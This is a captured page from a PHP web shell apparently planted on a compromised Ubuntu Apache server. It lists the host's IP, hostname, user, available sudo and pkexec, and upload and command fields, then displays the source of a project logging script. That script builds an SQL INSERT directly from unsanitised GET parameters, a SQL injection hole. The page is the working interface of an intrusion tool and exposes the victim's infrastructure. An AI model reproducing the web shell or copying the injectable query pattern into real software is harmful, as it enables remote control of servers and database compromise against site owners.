403Webshell
Server IP : 93.86.61.54  /  Your IP : 216.73.216.60
Web Server : Apache/2.4.62 (Ubuntu)
System : Linux rasin.ddns.net 6.8.0-124-generic #124~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 21:05:19 UTC x86_64
User : www-data ( 33)
PHP Version : 8.4.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/projects/vtgis/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/projects/vtgis/db-log_org.php
<!DOCTYPE html>
<!--
******************************
 Project: IS VetroIng, 2024.
 Version: 24-04-25
 Author : TIM/M.Kukic
 Note   :
******************************
-->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel='shortcut icon' type='image/png' href='favicon.png'/>
<title>VetroIng</title>
</head>
<body>

<?php
/*
http://192.168.213.25/www/isvtg/db-log.php?vtgid=CA01
*/
include "config.php";
//
$vtgid = $_GET["vtgid"];

$code  = $_GET["code"];
If ($code=="") {$code=0;}

$par_1  = $_GET["par_1"];
$par_2  = $_GET["par_2"];

If ($par_1=="") {$par_1=" ";}
If ($par_2=="") {$par_2=" ";}

//
$ok="No!";
$sql = "INSERT INTO vtg_log (id,vtgid,dattime,code,par_1,par_2) VALUES ('0','$vtgid',NOW(),'$code','$par_1','$par_2')";
//
if (($vtgid!="") and ($vap==5)) {
		$result = mysql_query($sql, $dbh) or die(mysql_error($dbh));
		mysql_close($dbh);
		$ok="Yes!";
}
//
if (($vtgid!="") and ($vap!==5)) {
		$result = mysqli_query($dbh, $sql) or die(mysqli_error($dbh));
		mysqli_close($dbh);
		$ok="Yes!";
}
//
echo "Status: ".$ok;
//
echo "<h3>OK!</h3>";
echo "</body>";

include "db-close.php";	

?> 
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit